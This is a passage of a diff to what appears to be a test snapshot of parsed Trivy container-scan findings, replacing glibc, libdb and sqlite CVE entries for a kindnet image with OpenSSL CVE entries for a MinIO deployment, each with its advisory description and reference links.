"https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19126", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19126", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", - "https://linux.oracle.com/cve/CVE-2019-19126.html", - "https://linux.oracle.com/errata/ELSA-2020-3861.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", - "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-19126", + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", ], }, "category": "Vulnerability", - "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19126", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19126", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - }, - { - "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-27645", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-27645", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", - "https://linux.oracle.com/cve/CVE-2021-27645.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", - "https://security.gentoo.org/glsa/202107-07", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2021-27645", - ], - }, - "category": "Vulnerability", - "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-27645", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-27645", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-8457", - "installedVersion": "5.3.28+dfsg1-0.5", - "packageName": "libdb5.3", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2097", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - "https://access.redhat.com/security/cve/CVE-2019-8457", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://linux.oracle.com/cve/CVE-2019-8457.html", - "https://linux.oracle.com/errata/ELSA-2020-1810.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", - "https://security.netapp.com/advisory/ntap-20190606-0002/", - "https://ubuntu.com/security/notices/USN-4004-1", - "https://ubuntu.com/security/notices/USN-4004-2", - "https://ubuntu.com/security/notices/USN-4019-1", - "https://ubuntu.com/security/notices/USN-4019-2", - "https://usn.ubuntu.com/4004-1/", - "https://usn.ubuntu.com/4004-2/", - "https://usn.ubuntu.com/4019-1/", - "https://usn.ubuntu.com/4019-2/", - "https://www.cve.org/CVERecord?id=CVE-2019-8457", - "https://www.oracle.com/security-alerts/cpuapr2020.html", - "https://www.oracle.com/security-alerts/cpujan2020.html", - "https://www.oracle.com/security-alerts/cpujul2020.html", - "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", - "https://www.sqlite.org/releaselog/3_28_0.html", - "https://www.sqlite.org/src/info/90acdbfce9c08858", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2097", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "https://linux.oracle.com/cve/CVE-2022-2097.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220715-0011/", + "https://security.netapp.com/advisory/ntap-20230420-0008/", + "https://ubuntu.com/security/notices/USN-5502-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "https://www.debian.org/security/2023/dsa-5343", + "https://www.openssl.org/news/secadv/20220705.txt", ], }, "category": "Vulnerability", - "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "sqlite: heap out-of-bound read in function rtreenode()", + "name": "AES OCB fails to encrypt some bytes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-8457", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-2097", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", + "value": "https://access.redhat.com/security/cve/CVE-2022-2097", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-1", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-2", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-1", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4004-1/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4004-2/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4019-1/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4019-2/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2020.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://www.sqlite.org/releaselog/3_28_0.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", }, { "type": "URL", - "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-12886", - "installedVersion": 